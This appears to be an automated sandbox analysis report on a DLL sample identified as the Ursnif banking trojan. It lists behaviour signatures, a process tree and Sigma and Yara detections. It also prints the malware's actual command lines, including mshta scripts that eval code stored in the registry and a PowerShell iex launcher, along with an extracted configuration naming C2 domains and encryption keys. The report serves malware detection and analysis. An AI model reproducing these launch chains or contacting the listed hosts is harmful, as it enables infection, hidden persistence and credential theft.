Loading ...

Play interactive tourEdit tour

Windows Analysis Report data.dll

Overview

General Information

Sample Name:data.dll
Analysis ID:498359
MD5:b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1:4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256:7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
May check the online IP address of the machine
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6856 cmdline: loaddll32.exe 'C:\Users\user\Desktop\data.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 484 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1848 cmdline: rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4868 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6508 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4500 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Father MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1444 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 6988 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 3980 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 4812 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6836 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5528 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 3656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5008 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 1424 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 3512 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4268 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4772 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 1260 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • mshta.exe (PID: 6692 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3740 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4504 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2088 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
        00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 98 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.loaddll32.exe.10d8cd6.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.2.loaddll32.exe.dd0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.2.rundll32.exe.5d0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.30a94a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    5.3.rundll32.exe.4f694a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4588, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', ProcessId: 6836
                      Sigma detected: Suspicious Rundll32 ActivityShow sources
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6988, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 3980
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132780367479355110.4588.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KTAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0icAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/lbKAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/Avira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2BAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLyAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/lAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/iAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: data.dllVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: art.microsoftsofymicrosoftsoft.atVirustotal: Detection: 10%Perma Link
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00DD3FAB
                      Source: data.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: data.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
